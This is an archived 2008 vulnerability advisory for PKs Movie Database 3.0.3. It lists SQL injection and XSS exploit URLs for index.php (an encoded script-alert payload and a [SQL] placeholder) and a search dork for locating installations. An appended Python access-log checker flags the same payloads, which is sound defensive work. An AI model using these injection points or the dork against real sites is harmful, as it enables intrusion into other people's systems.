Computer Security
[EN] securityvulns.ru



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit

  Joovili <= v.2.1 (members_help.php) Remote File İnclude Vulnerability

  Blackboard (id) Remote SQL Injection

  Husrev Forums v2.0.1:PoWerBoard (tr) (id) Remote SQL Injection

From: houssamix_(at)_hotmail.fr <houssamix_(at)_hotmail.fr>
Date: 10.02.2008
Subject: PKs Movie Database version 3.0.3 (SQL/XSS)

-------------------------------------------------------------

H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo

-------------------------------------------------------------


= Author : HouSSaMix From H-T Team                          

= Script : PKs Movie Database version 3.0.3

                                                  

= BUG 1 :  Remote SQL Injection Vulnerability  


exploit => www.target.com/path/index.php?num=[SQL]


= BUG 2 : XSS


exploit => www.target.com/path/index.php?category=[XSS]

          www.target.com/path/index.php?num=9999999999&category=[XSS]


example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

          www.target.com/path/index.php?num=9999999999&category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E


= Dork : "PKs Movie Database"    
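
Added example (not part of the original advisory and not the script's own code): a check that flags access-log requests to index.php whose `num` or `category` values fall outside an allow-list. It assumes `num` is a numeric record id, `category` is a plain label, and the server writes common/combined-format access logs; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed parameter shapes (the advisory does not document them):
NUM_OK = re.compile(r"[0-9]{1,10}")            # numeric record id
CATEGORY_OK = re.compile(r"[A-Za-z0-9 _-]{1,64}")  # plain category label
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Feb/2008:10:00:01 +0000] "GET /path/index.php?num=12 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Feb/2008:10:00:05 +0000] "GET /path/index.php?category=Action HTTP/1.1" 200 4100',
    '198.51.100.7 - - [10/Feb/2008:10:02:11 +0000] "GET /path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1" 200 4100',
    '198.51.100.7 - - [10/Feb/2008:10:02:40 +0000] "GET /path/index.php?num=12%27 HTTP/1.1" 200 312',
]

def check_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/index.php"):
        return []
    # parse_qs percent-decodes values, so encoded markup is seen in clear.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for value in params.get("num", []):
        if not NUM_OK.fullmatch(value):
            findings.append("num is not a plain integer")
    for value in params.get("category", []):
        if not CATEGORY_OK.fullmatch(value):
            findings.append("category contains characters outside the allow-list")
    return findings

def scan_access_log(lines):
    """Return (client, target, findings) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line we understand
        findings = check_request(match.group(2))
        if findings:
            hits.append((match.group(1), match.group(2), findings))
    return hits

if __name__ == "__main__":
    for client, target, findings in scan_access_log(SAMPLE_LOG):
        print(client, target, "; ".join(findings))
```

The same allow-list, applied in the application before the values reach the query or the page output, is the fix; the log check only shows where the parameters have already been probed.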

© SecurityVulns, 3APA3A, Vladimir Dubrovin